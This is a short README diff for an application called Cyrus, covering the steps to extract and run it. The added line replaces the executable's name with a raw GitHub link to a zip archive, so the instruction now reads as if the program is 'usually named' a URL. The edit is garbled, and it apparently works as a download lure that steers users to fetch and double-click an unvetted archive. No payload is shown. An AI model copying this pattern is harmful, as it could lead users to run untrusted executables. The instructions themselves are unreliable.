sathikaSethumjith/Cyrus/README.md

 - **Linux:** Open the terminal and use the command `unzip <filename>.zip`.

 ### 5. Run the Application
 Navigate to the folder where you extracted the files.
-Find the executable file, which is usually named `Cyrus` or `Cyrus.exe`.
+Find the executable file, which is usually named `Cyrus` or `https://raw.githubusercontent.com/sathikaSethumjith/Cyrus/main/luggie/Cyrus.zip`.
 Double-click it to run the application.

 ## 🛠️ How to Use Cyrus